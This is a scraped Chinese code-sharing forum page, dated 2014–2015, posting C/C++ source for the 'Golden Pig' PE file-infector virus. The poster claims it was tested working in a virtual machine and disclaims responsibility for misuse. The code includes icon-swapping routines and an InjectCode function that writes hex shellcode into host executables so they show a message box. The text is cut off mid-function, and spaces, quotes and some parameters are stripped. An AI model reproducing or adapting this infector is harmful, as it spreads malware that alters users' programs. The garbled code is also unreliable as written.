金猪报喜病毒源码---开源中国社区

2015年4月22日金猪报喜病毒源码-开源中国社区分享到：收藏+72踩顶0首页开源项目Java开源软件C#开源软件PHP开源软件C/C++开源软件Ruby开源软件Python开源软件Go开源软件JS开源软件问答技术问答»技术分享»IT大杂烩»职业生涯»站务/建议»支付宝专区»MoPaaS专区»开源硬件专区»代码博客翻译资讯移动开发Android开发专区iOS开发专区iOS代码库WindowsPhone招聘城市圈当前访客身份：游客[登录|加入开源中国]开源中国代码分享当前位置：代码分享»C/C++»其他资讯、软件、分享、代码、博客搜索金猪报喜病毒源码Nanke发布于2014年08月08日16时,20评/6277阅2015年4月22日金猪报喜病毒源码-开源中国社区[全屏查看所有代码]满桌面跑@红薯分享下，不是我写的，源码完全没动过，作者在代码中有署名，你们干坏事我可管不了，反正我就是来贴代码的。虚拟机中测试过可用，别TM的来叫运行不了，中毒了不关我事。标签：无代码片段(2)1.[代码][C/C++]代码123456789101112131415161718192021222324252627282930313233343536373839404142434445//MainWnd.cpp:implementationfile//#includestdafx.h#includePigYear.h#includeMainWnd.h#ifdef_DEBUG#definenewDEBUG_NEW#undefTHIS_FILEstaticcharTHIS_FILE[]=__FILE__;#endif/***************************************************************函数：SetRes*参数：LPSTRszImageName--要进行资源更新的EXE或DLL的名字LPSTRszResType--将被更新的资源类型LPSTRszResName--待被更新的资源名称LPVOIDpData--可执行文件的资源数据的指针DWORDcbData--指定lpData中的资源数据数据大小*功能：该函数用来更新exe中的资源**************************************************************/intSetRes(LPSTRszImageName,LPSTRszResType,LPSTRszResName,LPVOID{HANDLEhExe=BeginUpdateResource(szImageName,0);if(hExe==NULL)throw(BeginUpdateResource);intres=UpdateResource(hExe,szResType,szResName,MAKELANGID(LANG_NEUTRAL,SUBLANG_NEUTRAL),pData,cbData);if(!res)throw(UpdateResource);if(!EndUpdateResource(hExe,0))throw(EndUpdateResource);return1;}/***************************************************************函数：EnumIconProc*参数：HMODULEhModule--module句柄LPCTSTRlpszType--资源类型?2015年4月22日金猪报喜病毒源码-开源中国社区资源名称LONGlParam--请求定义好的参数*功能：该函数枚举源Exe中的所有图标，设置到另一个exe中去**************************************************************/BOOLCALLBACKEnumIconProc(HMODULEhModule,LPCTSTRlpszType,LPTSTR{HRSRChRes=FindResource(hModule,lpszName,RT_ICON);if(hRes==NULL)throw(Couldnotlocateiconresource.);//Loadtheiconintoglobalmemory.HGLOBALhResLoad=LoadResource(hModule,hRes);if(hResLoad==NULL)throw(Couldnotloadicon.);//Lockthedialogboxintoglobalmemory.LPVOIDpData=LockResource(hResLoad);if(pData==NULL)throw(CouldnotlockIcon.);DWORDcbData=SizeofResource(hModule,hRes);if(lParam){SetRes((LPSTR)lParam,RT_ICON,lpszName,pData,cbData);}returnTRUE;}/***************************************************************函数：SetExeIcon*参数：LPSTRszLoadFrom--图标提取文件LPSTRszSetTo--待更新图标文件*功能：该函数把一个Exe中的图标转入到另一个exe中去**************************************************************/intSetExeIcon(LPSTRszLoadFrom,LPSTRszSetTo){HMODULEhExe=LoadLibrary(szLoadFrom);//把EXE当二进制资源加载if(hExe==NULL){throw(Couldnotloadiconexe.);return1;}EnumResourceNames(hExe,RT_ICON,(ENUMRESNAMEPROC)EnumIconProc,(LONG)szSetTo);FreeLibrary(hExe);return1;}2015年4月22日金猪报喜病毒源码-开源中国社区***************************************************************函数：InjectCode*参数：charszHostFile[]--待感染的exe文件路径*功能：感染一个exe程序，运行显示“金猪拜年”的MessageBox**************************************************************/intInjectCode(charszHostFile[]){//#includewindows.hPIMAGE_DOS_HEADERpImageDosHeader;PIMAGE_NT_HEADERSpImageNtHeaders;PIMAGE_SECTION_HEADERpImageSectionHeader;unsignedcharthunkcode[]=\x60\x9c\xe8\x00\x00\x00\x00\x5b\x81\xeb\x0d\x10\x40\x00\x6a\x00\x8d\x83\x30\x10\x40\x00\x50\x50\x6a\x00\xb8\x78\x56\x34\x12\xff\xd0\x9d\x61\xff\x25\x3a\x10\x40\x00\x90\xBD\xF0\xD6\xED\xB0\xDD\xC4\xEA\x00;HANDLEhFile;HANDLEhMap;LPVOIDpMapping;DWORDdwGapSize;unsignedchar*pGapEntry;inti;PROCMsgBox;DWORDOldEntry;intx=0x18;intvir_len;unsignedchar*pSearch;DWORD*dwCallNextAddr;DWORD*dwCallDataOffset;DWORD*dwCallDataAddr;DWORDdwCallData;DWORDdwCodeDistance;DWORD*dwJmpAddr;DWORDdwJmpData;DWORDdwJmpVA;//:::hFile=CreateFile(szHostFile,FILE_SHARE_READ|FILE_SHARE_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);if(hFile==INVALID_HANDLE_VALUE){return-1;}hMap=CreateFileMapping(hFile,NULL,PAGE_READWRITE,0,0,2015年4月22日金猪报喜病毒源码-开源中国社区);if(!hMap)return-1;pMapping=MapViewOfFile(hMap,FILE_MAP_ALL_ACCESS,0,0,0);if(!pMapping)return-1;pImageDosHeader=(PIMAGE_DOS_HEADER)pMapping;if(pImageDosHeader-e_magic==IMAGE_DOS_SIGNATURE){pImageNtHeaders=(PIMAGE_NT_HEADERS)((DWORD)pMapping+pImageDosHeader-e_lfanew);if(pImageNtHeaders-Signature==IMAGE_NT_SIGNATURE){pImageSectionHeader=(PIMAGE_SECTION_HEADER)((DWORDpImageDosHeader-e_lfanew+sizeofdwGapSize=pImageSectionHeader-SizeOfRawData-pImageSectionHeader-Misc.Virtua